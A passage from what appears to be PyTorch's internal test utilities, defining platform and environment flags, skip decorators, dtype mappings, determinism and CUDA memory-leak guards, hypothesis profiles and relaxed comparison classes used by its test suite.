unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_CUDA = torch.cuda.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = torch.onnx._CAFFE2_ATEN_FALLBACK
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Enables crossref tests, in addition to standard tests which
# are being run. crossref tests work by installing a torch
# function mode that runs extra compute alongside the regular
# computation that happens with the test. After both computations
# are done, we cross-reference them (thus the name) to check for
# correction, before throwing out the extra compute and proceeding
# as we had before. By default, we don't run these tests.
TEST_WITH_CROSSREF = os.getenv('PYTORCH_TEST_WITH_CROSSREF', '0') == '1'
def skipIfCrossRef(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_CROSSREF:
raise unittest.SkipTest("test doesn't currently with crossref")
else:
fn(*args, **kwargs)
return wrapper
class CrossRefMode(torch.overrides.TorchFunctionMode):
def __torch_function__(self, func, types, args=(), kwargs=None):
kwargs = kwargs or {}
r = func(*args, **kwargs)
return r
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# If this is True then CUDA memory leak checks are skipped. If this is false
# then CUDA memory leak checks are performed.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
# numpy dtypes like np.float64 are not instances, but rather classes. This leads to rather absurd cases like
# np.float64 != np.dtype("float64") but np.float64 == np.dtype("float64").type.
# Especially when checking against a reference we can't be sure which variant we get, so we simply try both.
def numpy_to_torch_dtype(np_dtype):
try:
return numpy_to_torch_dtype_dict[np_dtype]
except KeyError:
return numpy_to_torch_dtype_dict[np_dtype.type]
def has_corresponding_torch_dtype(np_dtype):
try:
numpy_to_torch_dtype(np_dtype)
return True
except KeyError:
return False
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
torch_to_numpy_dtype_dict.update({
torch.bfloat16: np.float32,
torch.complex32: np.complex64
})
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoXNNPACK(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch.backends.xnnpack.enabled:
raise unittest.SkipTest('XNNPACK must be enabled for these tests. Please build with USE_XNNPACK=1.')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def _decide_skip_caffe2(expect_caffe2, reason):
def skip_dec(func):
def wrapper(self):
if torch.onnx._CAFFE2_ATEN_FALLBACK != expect_caffe2:
raise unittest.SkipTest(reason)
return func(self)
return wrapper
return skip_dec
skipIfCaffe2 = _decide_skip_caffe2(False, "Not compatible with Caffe2")
skipIfNoCaffe2 = _decide_skip_caffe2(True, "Caffe2 is not available")
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
# no_dispatch needed for test_composite_compliance
# Some OpInfos use freeze_rng_state for rng determinism, but
# test_composite_compliance overrides dispatch for all torch functions
# which we need to disable to get and set rng state
with no_dispatch():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
try:
yield
finally:
with no_dispatch():
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError as te:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
# Stores CUDA memory data provided by PyTorch's caching allocator and
# the CUDA driver.
#
# NOTE: The undocumented torch.cuda.mem_get_info() returns
# (#free bytes, #total bytes available) on the GPU
def __enter__(self):
self.caching_allocator_befores = []
self.driver_befores = []
# Performs a gc if required (required if any CUDA memory is held)
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
# NOTE: gc is based exclusively on caching allocator memory
# because the driver will always have some bytes in use (context size?)
if caching_allocator_mem_allocated > 0:
gc.collect()
torch.cuda.empty_cache()
break
# Acquires caching allocator and driver statistics before the test is run
for i in range(num_devices):
self.caching_allocator_befores.append(torch.cuda.memory_allocated(i))
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
self.driver_befores.append(driver_mem_allocated)
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
# Compares caching allocator before/after statistics
# An increase in allocated memory is a discrepancy indicating a possible
# memory leak
discrepancy_detected = False
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
discrepancy_detected = True
break
# Short-circuits if no discrepancy detected
if not discrepancy_detected:
return
# Validates the discrepancy persists after garbage collection and
# is confirmed by the driver API
# NOTE: driver API iscrepancies alone are ignored because with the jiterator
# some tests may permanently increase the CUDA context size and
# that will appear as a driver memory leak but is the expected behavior.
# GCs and clears the cache
gc.collect()
torch.cuda.empty_cache()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
caching_allocator_discrepancy = False
driver_discrepancy = False
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
caching_allocator_discrepancy = True
if driver_mem_allocated > self.driver_befores[i]:
driver_discrepancy = True
if caching_allocator_discrepancy and not driver_discrepancy:
# Just raises a warning if the leak is not validated by the
# driver API
# NOTE: this may be a problem with how the caching allocator collects its
# statistics or a leak too small to trigger the allocation of an
# additional block of memory by the CUDA driver
msg = ("CUDA caching allocator reports a memory leak not "
"verified by the driver API in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
warnings.warn(msg)
elif caching_allocator_discrepancy and driver_discrepancy:
# A caching allocator discrepancy validated by the driver API is a
# failure (except on ROCm, see below)
msg = ("CUDA driver API confirmed a leak in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if TEST_WITH_ROCM:
warnings.warn(msg)
else:
raise RuntimeError(msg)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
# Used in check_if_enable to see if a test method should be disabled by an issue,
# sanitizes a test method name from appended suffixes by @dtypes parametrization.
# e.g., an issue with title "DISABLED test_bitwise_ops (__main__.TestBinaryUfuncs)" should
# disabled ALL parametrized test_bitwise_ops tests, such test_bitwise_ops_cuda_int32
def remove_device_and_dtype_suffixes(test_name: str) -> str:
# import statement is localized to avoid circular dependency issues with common_device_type.py
from torch.testing._internal.common_device_type import get_device_type_test_bases
device_suffixes = [x.device_type for x in get_device_type_test_bases()]
dtype_suffixes = [str(dt)[len("torch."):] for dt in get_all_dtypes()]
test_name_chunks = test_name.split("_")
if len(test_name_chunks) > 0 and test_name_chunks[-1] in dtype_suffixes:
if len(test_name_chunks) > 1 and test_name_chunks[-2] in device_suffixes:
return "_".join(test_name_chunks[0:-2])
return "_".join(test_name_chunks[0:-1])
return test_name
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
raw_test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and raw_test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
sanitized_test_method_name = remove_device_and_dtype_suffixes(test._testMethodName)
if not IS_SANDCASTLE and disabled_tests_dict is not None:
for disabled_test, (issue_url, platforms) in disabled_tests_dict.items():
disable_test_parts = disabled_test.split()
if len(disable_test_parts) > 1:
disabled_test_name = disable_test_parts[0]
disabled_test_suite = disable_test_parts[1][1:-1]
# if test method name or its sanitized version exactly matches the disabled test method name
# AND allow non-parametrized suite names to disable parametrized ones (TestSuite disables TestSuiteCPU)
if (test._testMethodName == disabled_test_name or sanitized_test_method_name == disabled_test_name) \
and disabled_test_suite in test_suite:
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
skip_msg = f"Test is disabled because an issue exists disabling it: {issue_url}" \
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " \
"If you're seeing this on your local machine and would like to enable this test, " \
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests."
raise unittest.SkipTest(skip_msg)
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# `TestCase.assertEqual` is very permissive and coerced the inputs into a format that could be compared. This is very
# convenient when writing tests, but not so much while reviewing them. By default, the comparison `Pair` framework of
# `torch.testing._comparison.assert_equal`, used for example by the public testing function
# `torch.testing.assert_close`, is more strict. In order to use the same framework and thus reduce the divergence
# between internal and external comparison logic as much as possible, we define some "relaxed" pairs here. They only
# change the supported inputs, but the comparison logic is the same.
# TODO: Revisit the relaxed pairs and check how much work it is to fix the tests that would fail without the relaxation.
class RelaxedBooleanPair(BooleanPair):
"""Pair for boolean-like inputs.
In contrast to the builtin :class:`BooleanPair`, this class also supports one input being a number or a single
element tensor-like.
"""
_supported_number_types = NumberPair(0, 0)._supported_types
def _process_inputs(self, actual, expected, *, id):
# We require only one of the inputs of the inputs to be a boolean and the other can also be a boolean, a
# number, or a single element tensor or array, whereas in default BooleanPair both inputs have to be booleans.
tensor_or_array_types: Tuple[Type, ...] = (torch.Tensor, np.ndarray)
other_supported_types = (*self._supported_types, *self._supported_number_types, *tensor_or_array_types)
if not (
(isinstance(actual, self._supported_types) and isinstance(expected, other_supported_types))
or (isinstance(expected, self._supported_types) and isinstance(actual, other_supported_types))
):
raise UnsupportedInputs()
return [self._to_bool(input, id=id) for input in (actual, expected)]
def _to_bool(self, bool_like, *, id):
if isinstance(bool_like, np.number):
return bool(bool_like.item())
elif type(bool_like) in self._supported_number_types:
return bool(bool_like)
elif isinstance(bool_like, (torch.Tensor, np.ndarray)):
numel = bool_like.numel() if isinstance(bool_like, torch.Tensor) else bool_like.size
if numel > 1:
raise ErrorMeta(
ValueError,
f"Only single element tensor-likes can be compared against a boolean. "
f"Got {numel} elements instead.",
id=id,
)
return bool(bool_like.item())
else:
return super()._to_bool(bool_like, id=id)
class RelaxedNumberPair(NumberPair):
"""Pair for number-like inputs.
In contrast to the builtin :class:`NumberPair`, this class also supports one input being a single element
tensor-like or a :class:`enum.Enum`. (D)Type checks are disabled, meaning comparing 1 to 1.0 succeeds even when
``check_dtype=True`` is passed.
In addition, this class uses looser default tolerances for :class:`float` and :class:`complex` inputs. Also
supports overriding the absolute and relative tolerance through the ``@precisionOverride`` and
``@toleranceOverride`` decorators.
"""
_TYPE_TO_DTYPE = {
int: torch.int64,
float: torch.float32,
complex: torch.complex64,
}
def __init__(
self, actual, expected, *, rtol_override=0.0, atol_override=0.0, check_dtype=None, **other_parameters
) -> None:
super().__init__(actual, expected, check_dtype=False, **other_parameters)
self.rtol = max(self.rtol, rtol_override)
self.atol = max(self.atol, atol_override)
def _process_inputs(self, actual, expected, *, id):
# We require only one of the inputs of the inputs to be a number and the other can also be a number or a single
# element tensor or array, whereas in default NumberPair both inputs have to be numbers.
tensor_or_array_types: Tuple[Type, ...] = (torch.Tensor, np.ndarray)
other_supported_types = (*self._supported_types, *tensor_or_array_types)
if not (
(isinstance(actual, self._supported_types) and isinstance(expected, other_supported_types))
or (isinstance(expected, self._supported_types) and isinstance(actual, other_supported_types))
):
raise UnsupportedInputs()
return [self._to_number(input, id=id) for input in (actual, expected)]
def _to_number(self, number_like, *, id):
if isinstance(number_like, (torch.Tensor, np.ndarray)):
numel = number_like.numel() if isinstance(number_like, torch.Tensor) else number_like.size
if numel > 1:
raise ErrorMeta(
ValueError,
f"Only single element tensor-likes can be compared against a number. "
f"Got {numel} elements instead.",
id=id,
)
number = number_like.item()
if isinstance(number, bool):
number = int(number)
return number
elif isinstance(number_like, Enum):
return int(number_like) # type: ignore[call-overload]
else:
return super()._to_number(number_like, id=id)
class TensorOrArrayPair(TensorLikePair):
"""Pair for tensor-like inputs.
On the one hand this class is stricter than the builtin :class:`TensorLikePair` since it only allows instances of
:class:`torch.Tensor` and :class:`numpy.ndarray` rather than allowing any tensor-like than can be converted into a
tensor. On the other hand this class is looser since it converts all inputs into tensors with no regard of their
relationship, e.g. comparing a :class:`torch.Tensor` to :class:`numpy.ndarray` is fine.
In addition, this class supports overriding the absolute and relative tolerance through the ``@precisionOverride``
and ``@toleranceOverride`` decorators.
"""
def __init__(self, actual, expected, *, rtol_override=0.0, atol_override=0.0, **other_parameters):
super().__init__(actual, expected, **other_parameters)
self.rtol = max(self.rtol, rtol_override)
self.atol = max(self.atol, atol_override)
def _process_inputs(self, actual, expected, *, id, allow_subclasses):
self._check_inputs_isinstance(actual, expected, cls=(torch.Tensor, np.ndarray))
actual, expected = [self._to_tensor(input) for input in (actual, expected)]
for tensor in (actual, expected):
self._check_supported(tensor, id=id)
return actual, expected
class UnittestPair(Pair):
"""Fallback ABC pair that handles non-numeric inputs.
To avoid recreating the mismatch messages of :meth:`unittest.TestCase.assertEqual`, this pair simply wraps it in
order to use it with the :class:`Pair` "framework" from :func:`assert_equal`.
Define the :attr:`UnittestPair.CLS` in a subclass to indicate which class(es) of the inputs the pair should support.
"""
CLS: Union[Type, Tuple[Type, ...]]
TYPE_NAME: Optional[str] = None
def __init__(self, actual, expected, **other_parameters):
self._check_inputs_isinstance(actual, expected, cls=self.CLS)
super().__init__(actual, expected, **other_parameters)
def compare(self):
test_case = unittest.TestCase()
try:
return test_case.assertEqual(self.actual, self.expected)
except test_case.failureException as error:
msg = str(error)
type_name = self.TYPE_NAME or (self.CLS if isinstance(self.CLS, type) else self.CLS[0]).__name__
raise self._make_error_meta(AssertionError, f"{type_name.title()} comparison failed: {msg}")
class StringPair(UnittestPair):
CLS = string_classes
TYPE_NAME = "string"
class SetPair(UnittestPair):
CLS = set
class TypePair(UnittestPair):
CLS = type
class ObjectPair(UnittestPair):
CLS = object
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
